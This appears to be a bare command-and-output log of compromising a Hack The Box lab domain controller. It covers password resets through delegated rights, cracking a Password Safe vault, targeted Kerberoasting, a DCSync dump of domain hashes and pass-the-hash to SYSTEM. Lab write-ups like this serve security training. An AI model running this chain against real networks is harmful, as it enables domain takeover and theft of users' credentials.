nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.42
 
Nmap scan report for 10.10.11.42
Host is up (0.027s latency).
Not shown: 62876 closed tcp ports (reset), 2633 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-08 04:12:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
53348/tcp open  msrpc         Microsoft Windows RPC
56941/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56946/tcp open  msrpc         Microsoft Windows RPC
56953/tcp open  msrpc         Microsoft Windows RPC
56958/tcp open  msrpc         Microsoft Windows RPC
56971/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/7%OT=21%CT=1%CU=40000%PV=Y%DS=2%DC=T%G=Y%TM=677D9
OS:8E5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=105%TI=I%CI=I%TS=A)SEQ(SP
OS:=102%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=102%GCD=2%ISR=105%TI=
OS:I%CI=I%II=I%SS=S%TS=A)SEQ(SP=103%GCD=1%ISR=106%TI=I%CI=RD%II=I%SS=S%TS=A
OS:)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53
OS:CNW8ST11%O6=M53CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC
OS:)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
 
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-08T04:13:05
|_  start_date: N/A
|_clock-skew: 7h00m01s
 
TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   28.52 ms 10.10.14.1
2   28.98 ms 10.10.11.42

21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT

445/tcp   open  microsoft-ds?

smbclient -L \\\\10.10.11.42 -U dministrator.htb/Olivia
Password for [DMINISTRATOR.HTB\Olivia]:
 
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

nxc winrm 10.10.11.42 -u olivia -p 'ichliebedich'
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)

GetUserSPNs.py -dc-ip 10.10.11.42 administrator.htb/olivia
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
Password:
No entries found!

GetNPUsers.py administrator.htb/olivia -dc-ip 10.10.11.42
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
Password:
No entries found!

sudo bloodhound-python -u 'olivia' -p 'ichliebedich' -ns 10.10.11.42 -d administrator.htb -c all
zip -r administrator_htb.zip *.json

sudo neo4j console
sudo bloodhound

$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\olivia', $SecPassword)

sudo impacket-smbserver share -smb2support ./

*Evil-WinRM* PS C:\Users\olivia> copy \\10.10.14.21\share\PowerView.ps1 .\

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\PowerView.ps1

$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\olivia', $SecPassword)

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred

*Evil-WinRM* PS C:\Users\olivia> net user
 
User accounts for \\
 
-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia
The command completed with one or more errors.

nxc smb 10.10.11.42 -u 'michael' -p 'Password123!'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\michael:Password123!

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\michael', $SecPassword)

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred

nxc smb 10.10.11.42 -u 'benjamin' -p 'Password123!'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:Password123! 

ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||54242|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.

ftp> passive

ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.

ftp> get Backup.psafe3

file Backup.psafe3
Backup.psafe3: Password Safe V3 database

apt --fix-broken install
sudo dpkg -i passwordsafe-debian12-1.20-amd64.deb

pwsafe Backup.psafe3

pwsafe2john Backup.psafe3 > Backup.hash

john --wordlist=/usr/share/wordlists/rockyou.txt Backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 SSE2 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

nxc smb 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 

evil-winrm -i 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
815395ec...

evil-winrm 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)

Set-DomainObject -Credential $Cred -Identity ethan -SET @{serviceprincipalname='nonexistent/TEST'}

*Evil-WinRM* PS C:\Users\emily> copy \\10.10.14.21\share\PowerView.ps1

Set-ExecutionPolicy Bypass -Scope Process

git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip3 install -r requirements.txt
pip3 install .

pywhisker -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: c5272a60-654f-9d95-6082-fd0dda878bde
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: ITe8YivF.pfx
[*] Must be used with password: hxtWhRZgbVvmBSE7tixd
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

impacket-GetUserSPNs -dc-ip 10.10.11.42 administrator.htb/emily -request-user ethan 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
ServicePrincipalName  Name   MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  -----  --------  --------------------------  ---------  ----------
nonexistent/TEST      ethan            2024-10-12 16:52:14.117811  <never>               
 
 
 
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

sudo ntpdate 10.10.11.42 & python3 /opt/linux/targetedKerberoast.py -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[1] 19953
2025-01-08 18:19:07.343806 (-0500) +25202.559618 +/- 0.007379 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25202.559618
[1]  + done       sudo ntpdate 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$d646939b...$207a76008a076d9e5b888e7759f743418bd5777754dd4db44c46dfaec268aa672be866b0972b147e368ff11b85a5b72b968239a3df882db838e08d132bb28c11ea05934b852f6c523edbff594786992524db8396a015da552eed66e79854e2460f2f26579493d15bb6f5ec54e49fdae213b3a27a0d81b8ed0c1dd97f62e56bb3b515a33d1a1296fc0c893339a994244c860f9f13c411bab007eda82da96e2c627fe1ed3d2f8d6466050f422fe05bc50de029584ede135255ff0adb011e305c8c63f4c9d33e89c669f4afa5f72a8134f7e33b0b28eec15fd637222edaec5cdc7013df36aaa17f8f06f1a30fcb76ec2728d4505de84ff510765f33056f1da6cdf37dd3b9fbf505b4570143f412a77d9c00240f17ca239b288a654b3ebaee026ffe68e3bbed4494a0457ea2dfc2d8fa879b32dc90dbc0914ab50c0591e26179f5d91383f6e460a1f41c904c62c9c5ed551fab477e7624fd70c1893f30cf388243de25c94a630411b7809ef6e95840bf3dfe7d220a4e139230e325ccea8f7d75e07bda15a865ba61fd11eb3bcc46977da8a157b2b7501704172c6b476ecaf91e99751d739e15043854fbf36331e5770d701463966aef52eadb595be1c29719f1133a0b7447f901054d2fe9fd7d449303e43bbf2dd439d0d883793e276aa2a521038f06ce0cec3cbcebb528ed8069dc7c05d47052298bbb50fb8887098d6e7bd95741451e005af9d101289ffbb8f3ad6131a204fe49ad0f7e3830f102a9bad30f2a40054a965277cf1d9133328f81cfff186ffdf98a5b07499f6a8406fbf150114461429b3728d8d2e7a4088ee6b50284928017bc43cc81d85285322c636dc235c4ae16c858d50de778b864c291669c491fe96dfc703fe92f2459d076b0cbc2b88a8c74929dc2aa82dee8a5c19209c096cc4a8828ab3e0d2f8f225de2916f367239e0ad7d9a3c3c77eaab5a5b03a163f1dca69fd69374eae6081739714c109624020dea83567b3fae8a390e122dd94685119a6fd1953bb29bfc5590f9a63978771798bcd7ba40b140315d43b6633761f717a590b57bd26a4ba3f9e327d4ded48ec42b4db91460f1ba18385e2f69945e43ba9985549222907966dca616c8731cf2b5f183a95bb6e29289a2634bd4f0fa440448ea44513449ec7c0b9f3d0833babbd89364aedcdc73a13748ee4c450d14e6f614db3c8c30951e4379eae67041307a56adf45ef4b0b6a12c0dc1cd7a9eface97c5379856d8e00ecee09fbb1a199016a0c5bf3886c58433c6429fbebdf18ac4c5e777e6b4094fd4364c5c4ae0a9c568117900ec5a43f02136567bb72b67f68d09c1b79241277ba00abcb959c697295d47237ca81d90b635322458d8e9047a9066dc4e4280626d082ba853bdc4e16c42b9f2a71fa53099f991063c4f766ecfa900396befa345e571067fe132b13290659a06e2157a03ed4800e50dc20f6498813b9f1bba5f66211419db1524cf901f4f89fa4f21e7745d12ab2ca64d8357ecf8833a9d97e17a528aed48fb49fa43fafe13
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...$7ffb69618ea8f1e0c5b563bf933a51c9eb74fa340a1252c7390225d2adfadfc436bb497fdc562b9604fb277b5f70c28dc699434e32259f99c9faadd01a7dc9bdb8217d5ad79f4a3472c4b0013e13f116302d19f0899534db40f1736bc778fcbf0c74d66cee26c6fbcd28f341b175b5259edb059f6a2080634c36aac0c226f6bab32142d4a4add2a284b2e291f290032849f00780bb2bdee69759ecc62a9fdb939a4d0728aa294fd63bc956709124544369e0a4c3e3b0d24844187554ea7df1656625d62e0a25b81ec9625fdefbc35677f9a5ee5c1fddccebcab83d3d9df159aa58a38c6135ac9f94dc6fe9f876aa1ef1acd5bf3249f9092b566f25939c10c204407b24988454dae07792326233857b48bfe3d2ee0a504414618413b2f25a9e9be037511564927070278666977ea0b6ecf4fc43969e6c551558c417964b7215710a25288c9d32f2c9bc06c513e953cf3b38158db118630a818b318fbd761599ad26b3957ce005cfd7bcb679d4e267338a1e90eacc894d4d30e2b7fbf15c6482db40f1673b7bbb507df81fc33f75aa805f5d4b11bbe85b45451e0bb891c368ddb52c554803534b8bcff364eb40c9095fdebe9be80545f5e74304018cd4246cf59d5fda4098aea991fd9701bdb04cfe61967fc37664a2c2ba2408a6507c910cd08928e30b9bf10918f733d2cfd075925b3fa871437926dbfa05047285c5df4a1bc99e4ebb25bcb24d21ae16c7abe88ff259be389797dcfec2aa8abb5a44a90144139d93054e18250f5a6b965c6b31ac515a085f1cfaf27a599184defd9c9804bce9c75376cbb6d266fd5bee79040b052bd55878a45f7580d7f83218d3c4998c9ce46cf4bb93826fcd2c09d9e43d9340e20ecc2958448ac9f3c42a1884ff2d7052f2d8669f2235e64a52d1e78ecb6bee4ffd3786d25544f5b37722a798c49598cbeb8b90709b44dfcfa8fd9d4c5f051a10454573624826f55de351675a31d66d5342de42175ed62f48d1cbffea619a34a9fdf6053392b80477c54283c785873056f82e5b88b67182da2043163306358bc7d336e5363d6f1da715aec791e0eece0abf47dc291f6a88a35cf873d314fc181c37c745cf3b740ebb53227c17a14b8d8ec11d6c08df0bc61e023ff549d209fe6aab76436d99a80f50f589e65388bed2f6d6c808e22203fd212d8ff3b5a51a52326d30a29cd4e3bde0ebaa1add017804443c856eb10a73f946a61c2e771330d789a303975060e3532868ca181623fa0ef603a9ce92719e3b5afbb4f626b132e26b9baabad0c038e9ed75a83f3202b61dd84ed62c35dd7f1854a73e695d29a488d38f2984b824d8a1a51e818731f0a1ac33f7f99095bae311def7cad27dfd05bc644531003774005e76a7cfbeaa625361e2d1a414ac86faadc4ac20b1d0dee63283b5140651e7cb1c068a9c57b22546110ad731b5e15128f060005101cb25d9b42e683467a2e838874cc63710469fde145b6eaa0a78d9b0bde3ef56ad0d961b86fbbd38588ae570e87cedc94f619d845433

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...$7ffb69618ea8f1e0c5b563bf933a51c9eb74fa340a1252c7390225d2adfadfc436bb497fdc562b9604fb277b5f70c28dc699434e32259f99c9faadd01a7dc9bdb8217d5ad79f4a3472c4b0013e13f116302d19f0899534db40f1736bc778fcbf0c74d66cee26c6fbcd28f341b175b5259edb059f6a2080634c36aac0c226f6bab32142d4a4add2a284b2e291f290032849f00780bb2bdee69759ecc62a9fdb939a4d0728aa294fd63bc956709124544369e0a4c3e3b0d24844187554ea7df1656625d62e0a25b81ec9625fdefbc35677f9a5ee5c1fddccebcab83d3d9df159aa58a38c6135ac9f94dc6fe9f876aa1ef1acd5bf3249f9092b566f25939c10c204407b24988454dae07792326233857b48bfe3d2ee0a504414618413b2f25a9e9be037511564927070278666977ea0b6ecf4fc43969e6c551558c417964b7215710a25288c9d32f2c9bc06c513e953cf3b38158db118630a818b318fbd761599ad26b3957ce005cfd7bcb679d4e267338a1e90eacc894d4d30e2b7fbf15c6482db40f1673b7bbb507df81fc33f75aa805f5d4b11bbe85b45451e0bb891c368ddb52c554803534b8bcff364eb40c9095fdebe9be80545f5e74304018cd4246cf59d5fda4098aea991fd9701bdb04cfe61967fc37664a2c2ba2408a6507c910cd08928e30b9bf10918f733d2cfd075925b3fa871437926dbfa05047285c5df4a1bc99e4ebb25bcb24d21ae16c7abe88ff259be389797dcfec2aa8abb5a44a90144139d93054e18250f5a6b965c6b31ac515a085f1cfaf27a599184defd9c9804bce9c75376cbb6d266fd5bee79040b052bd55878a45f7580d7f83218d3c4998c9ce46cf4bb93826fcd2c09d9e43d9340e20ecc2958448ac9f3c42a1884ff2d7052f2d8669f2235e64a52d1e78ecb6bee4ffd3786d25544f5b37722a798c49598cbeb8b90709b44dfcfa8fd9d4c5f051a10454573624826f55de351675a31d66d5342de42175ed62f48d1cbffea619a34a9fdf6053392b80477c54283c785873056f82e5b88b67182da2043163306358bc7d336e5363d6f1da715aec791e0eece0abf47dc291f6a88a35cf873d314fc181c37c745cf3b740ebb53227c17a14b8d8ec11d6c08df0bc61e023ff549d209fe6aab76436d99a80f50f589e65388bed2f6d6c808e22203fd212d8ff3b5a51a52326d30a29cd4e3bde0ebaa1add017804443c856eb10a73f946a61c2e771330d789a303975060e3532868ca181623fa0ef603a9ce92719e3b5afbb4f626b132e26b9baabad0c038e9ed75a83f3202b61dd84ed62c35dd7f1854a73e695d29a488d38f2984b824d8a1a51e818731f0a1ac33f7f99095bae311def7cad27dfd05bc644531003774005e76a7cfbeaa625361e2d1a414ac86faadc4ac20b1d0dee63283b5140651e7cb1c068a9c57b22546110ad731b5e15128f060005101cb25d9b42e683467a2e838874cc63710469fde145b6eaa0a78d9b0bde3ef56ad0d961b86fbbd38588ae570e87cedc94f619d845433

hashcat -m 13100 ethan_tgs.txt /usr/share/wordlists/rockyou.txt
 
 
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...$7ffb69618ea8f1e0c5b563bf933a51c9eb74fa340a1252c7390225d2adfadfc436bb497fdc562b9604fb277b5f70c28dc699434e32259f99c9faadd01a7dc9bdb8217d5ad79f4a3472c4b0013e13f116302d19f0899534db40f1736bc778fcbf0c74d66cee26c6fbcd28f341b175b5259edb059f6a2080634c36aac0c226f6bab32142d4a4add2a284b2e291f290032849f00780bb2bdee69759ecc62a9fdb939a4d0728aa294fd63bc956709124544369e0a4c3e3b0d24844187554ea7df1656625d62e0a25b81ec9625fdefbc35677f9a5ee5c1fddccebcab83d3d9df159aa58a38c6135ac9f94dc6fe9f876aa1ef1acd5bf3249f9092b566f25939c10c204407b24988454dae07792326233857b48bfe3d2ee0a504414618413b2f25a9e9be037511564927070278666977ea0b6ecf4fc43969e6c551558c417964b7215710a25288c9d32f2c9bc06c513e953cf3b38158db118630a818b318fbd761599ad26b3957ce005cfd7bcb679d4e267338a1e90eacc894d4d30e2b7fbf15c6482db40f1673b7bbb507df81fc33f75aa805f5d4b11bbe85b45451e0bb891c368ddb52c554803534b8bcff364eb40c9095fdebe9be80545f5e74304018cd4246cf59d5fda4098aea991fd9701bdb04cfe61967fc37664a2c2ba2408a6507c910cd08928e30b9bf10918f733d2cfd075925b3fa871437926dbfa05047285c5df4a1bc99e4ebb25bcb24d21ae16c7abe88ff259be389797dcfec2aa8abb5a44a90144139d93054e18250f5a6b965c6b31ac515a085f1cfaf27a599184defd9c9804bce9c75376cbb6d266fd5bee79040b052bd55878a45f7580d7f83218d3c4998c9ce46cf4bb93826fcd2c09d9e43d9340e20ecc2958448ac9f3c42a1884ff2d7052f2d8669f2235e64a52d1e78ecb6bee4ffd3786d25544f5b37722a798c49598cbeb8b90709b44dfcfa8fd9d4c5f051a10454573624826f55de351675a31d66d5342de42175ed62f48d1cbffea619a34a9fdf6053392b80477c54283c785873056f82e5b88b67182da2043163306358bc7d336e5363d6f1da715aec791e0eece0abf47dc291f6a88a35cf873d314fc181c37c745cf3b740ebb53227c17a14b8d8ec11d6c08df0bc61e023ff549d209fe6aab76436d99a80f50f589e65388bed2f6d6c808e22203fd212d8ff3b5a51a52326d30a29cd4e3bde0ebaa1add017804443c856eb10a73f946a61c2e771330d789a303975060e3532868ca181623fa0ef603a9ce92719e3b5afbb4f626b132e26b9baabad0c038e9ed75a83f3202b61dd84ed62c35dd7f1854a73e695d29a488d38f2984b824d8a1a51e818731f0a1ac33f7f99095bae311def7cad27dfd05bc644531003774005e76a7cfbeaa625361e2d1a414ac86faadc4ac20b1d0dee63283b5140651e7cb1c068a9c57b22546110ad731b5e15128f060005101cb25d9b42e683467a2e838874cc63710469fde145b6eaa0a78d9b0bde3ef56ad0d961b86fbbd38588ae570e87cedc94f619d845433:limpbizkit

nxc smb 10.10.11.42 -u 'ethan' -p 'limpbizkit'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\ethan:limpbizkit 

secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42'
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435...:3dc553ce...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:1181ba47...:::
administrator.htb\olivia:1108:aad3b435...:fbaa3e22...:::
administrator.htb\michael:1109:aad3b435...:2b576acb...:::
administrator.htb\benjamin:1110:aad3b435...:2b576acb...:::
administrator.htb\emily:1112:aad3b435...:eb200a25...:::
administrator.htb\ethan:1113:aad3b435...:5c2b9f97...:::
administrator.htb\alexander:3601:aad3b435...:cdc9e5f3...:::
administrator.htb\emma:3602:aad3b435...:11ecd72c...:::
DC$:1000:aad3b435...:cf411dda...:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a...
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e0...
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec16...
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:7a206ee05e894781b99a0175a7fe6f7e1242913b2ab72d0a797cc45968451142
administrator.htb\michael:aes128-cts-hmac-sha1-96:b0f3074a...
administrator.htb\michael:des-cbc-md5:2586dc58c47c61f7
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:36cfe045bc49eda752ca34dd62d77285b82b8c8180c3846a09e4cb13468433a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:2cca9575...
administrator.htb\benjamin:des-cbc-md5:49376b671fadf4d6
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e...
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744...
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386...
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed62...
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a476...
DC$:des-cbc-md5:f483547c4325492a

impacket-psexec administrator@10.10.11.42 -hashes :3dc553ce...
 
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
[*] Requesting shares on 10.10.11.42.....
[*] Found writable share ADMIN$
[*] Uploading file HskZdNDB.exe
[*] Opening SVCManager on 10.10.11.42.....
[*] Creating service vpsi on 10.10.11.42.....
[*] Starting service vpsi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> type root.txt
551d2d31...